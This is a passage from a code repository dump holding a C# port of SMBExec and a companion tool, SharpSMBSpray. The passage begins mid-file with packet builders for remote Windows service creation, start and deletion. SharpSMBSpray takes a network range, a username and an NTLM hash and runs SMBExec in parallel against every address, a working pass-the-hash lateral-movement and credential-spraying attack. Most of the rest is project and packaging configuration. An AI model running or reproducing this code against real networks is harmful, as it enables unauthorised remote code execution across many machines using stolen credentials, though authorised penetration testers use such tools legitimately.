packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID", packet_referent_ID);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount", packet_service_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount", packet_service_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName", packet_service);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask", new byte[] { 0xff, 0x01, 0x0f, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType", new byte[] { 0x10, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType", new byte[] { 0x03, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount", packet_command_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount", packet_command_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName", packet_command);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
return packet_SCMCreateServiceW;
}
public static OrderedDictionary SCMStartServiceW(byte[] packet_context_handle)
{
OrderedDictionary packet_SCMStartServiceW = new OrderedDictionary();
packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle", packet_context_handle);
packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
return packet_SCMStartServiceW;
}
public static OrderedDictionary SCMDeleteServiceW(byte[] packet_context_handle)
{
OrderedDictionary packet_SCMDeleteServiceW = new OrderedDictionary();
packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle", packet_context_handle);
return packet_SCMDeleteServiceW;
}
public static OrderedDictionary SCMCloseServiceHandle(byte[] packet_context_handle)
{
OrderedDictionary packet_SCM_CloseServiceW = new OrderedDictionary();
packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle", packet_context_handle);
return packet_SCM_CloseServiceW;
}
#endregion
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/SharpInvoke-SMBExec.csproj
================================================
Debug
AnyCPU
{344EE55A-4E32-46F2-A003-69AD52B55945}
Library
Properties
SharpInvoke_SMBExec
Sharp-SMBExec
v4.0
512
true
AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
false
AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4
false
..\packages\IPNetwork.1.3.2.0\lib\LukeSkywalker.IPNetwork.dll
..\packages\PowerArgs.Dev.2.7.1.0\lib\net45\PowerArgs.dll
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Utilities.cs
================================================
using System;
using System.Collections;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Linq;
namespace SharpInvoke_SMBExec
{
class Utilities
{
public static ushort DataLength(int length_start, byte[] string_extract_data)
{
byte[] bytes = { string_extract_data[length_start], string_extract_data[length_start + 1] };
ushort string_length = BitConverter.ToUInt16(GetByteRange(string_extract_data, length_start, length_start + 1), 0);
return string_length;
}
public static byte[] GetByteRange(byte[] array, int start, int end)
{
var newArray = array.Skip(start).Take(end - start + 1).ToArray();
return newArray;
}
public static byte[] ConvertStringToByteArray(string hex)
{
return Enumerable.Range(0, hex.Length)
.Where(x => x % 2 == 0)
.Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
.ToArray();
}
public static byte[] ConvertFromPacketOrderedDictionary(OrderedDictionary packet_ordered_dictionary)
{
List byte_list = new List();
foreach (DictionaryEntry de in packet_ordered_dictionary)
{
byte_list.Add(de.Value as byte[]);
}
var flattenedList = byte_list.SelectMany(bytes => bytes);
byte[] byte_Array = flattenedList.ToArray();
return byte_Array;
}
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/packages.config
================================================
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpInvoke-SMBExec", "SharpInvoke-SMBExec\SharpInvoke-SMBExec.csproj", "{344EE55A-4E32-46F2-A003-69AD52B55945}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.Build.0 = Debug|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.ActiveCfg = Release|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
================================================
FILE: SharpSMBSpray/SharpSMBSpray/FodyWeavers.xml
================================================
================================================
FILE: SharpSMBSpray/SharpSMBSpray/FodyWeavers.xsd
================================================
A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
The order of preloaded assemblies, delimited with line breaks.
This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
Controls if .pdbs for reference assemblies are also embedded.
Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
A list of unmanaged 32 bit assembly names to include, delimited with |.
A list of unmanaged 64 bit assembly names to include, delimited with |.
The order of preloaded assemblies, delimited with |.
'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
A comma-separated list of error codes that can be safely ignored in assembly verification.
'false' to turn off automatic generation of the XML Schema file.
================================================
FILE: SharpSMBSpray/SharpSMBSpray/Program.cs
================================================
using System;
using System.Threading.Tasks;
using LukeSkywalker.IPNetwork;
namespace SharpSMBSpray
{
class Program
{
public static void Main(string[] args)
{
string target = args[0];
string username = args[1];
string hash = args[2];
// Parse CIDR
IPNetwork ipn = IPNetwork.Parse(target);
IPAddressCollection ips = IPNetwork.ListIPAddress(ipn);
// Parallel ForEach to iterate over IP's from CIDR block
Parallel.ForEach(ips, (ip) =>
{
try
{
string[] arguments;
string targetIP = ip.ToString();
arguments = new string[3] { targetIP, username, hash };
SharpInvoke_SMBExec.Program.Main(arguments);
}
catch (Exception e)
{
Console.WriteLine(e);
}
});
}
}
}
================================================
FILE: SharpSMBSpray/SharpSMBSpray/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpSMBSpray")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpSMBSpray")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("deb273ee-4418-4441-9078-4270aa094cce")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: SharpSMBSpray/SharpSMBSpray/SharpSMBSpray.csproj
================================================
Debug
AnyCPU
{DEB273EE-4418-4441-9078-4270AA094CCE}
Exe
SharpSMBSpray
SharpSMBSpray
v4.0
512
true
AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
AnyCPU
none
true
bin\Release\
TRACE
prompt
4
..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
..\packages\IPNetwork.1.3.2.0\lib\LukeSkywalker.IPNetwork.dll
..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll
False
..\..\Sharp-SMBExec\Sharp-SMBExec.dll
This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
================================================
FILE: SharpSMBSpray/SharpSMBSpray/packages.config
================================================
================================================
FILE: SharpSMBSpray/SharpSMBSpray.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30114.105
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSMBSpray", "SharpSMBSpray\SharpSMBSpray.csproj", "{DEB273EE-4418-4441-9078-4270AA094CCE}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpInvoke-SMBExec", "..\Sharp-SMBExec\SharpInvoke-SMBExec\SharpInvoke-SMBExec.csproj", "{344EE55A-4E32-46F2-A003-69AD52B55945}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DEB273EE-4418-4441-9078-4270AA094CCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DEB273EE-4418-4441-9078-4270AA094CCE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DEB273EE-4418-4441-9078-4270AA094CCE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DEB273EE-4418-4441-9078-4270AA094CCE}.Release|Any CPU.Build.0 = Release|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.Build.0 = Debug|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.ActiveCfg = Release|Any CPU
{344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {4736C86B-F064-42E2-80DC-5A4FDEEF1AA6}
EndGlobalSection
EndGlobal
================================================
FILE: SharpSMBSpray/packages/Costura.Fody.4.1.0/build/Costura.Fody.props
================================================
================================================
FILE: SharpSMBSpray/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml
================================================
Costura
Contains methods for interacting with the Costura system.
Call this to Initialize the Costura system.
================================================
FILE: SharpSMBSpray/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.xcf
================================================
A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
The order of preloaded assemblies, delimited with line breaks.
This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
Controls if .pdbs for reference assemblies are also embedded.
Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
A list of unmanaged 32 bit assembly names to include, delimited with |.
A list of unmanaged 64 bit assembly names to include, delimited with |.
The order of preloaded assemblies, delimited with |.
================================================
FILE: SharpSMBSpray/packages/Fody.6.0.0/build/Fody.targets
================================================
$(ProjectDir)FodyWeavers.xml
$(MSBuildThisFileDirectory)..\
$(FodyPath)netstandardtask
$(FodyPath)netclassictask
$(FodyAssemblyDirectory)\Fody.dll
$(DefaultItemExcludes);FodyWeavers.xsd
true
15
$([System.Version]::Parse($(MSBuildVersion)).Major)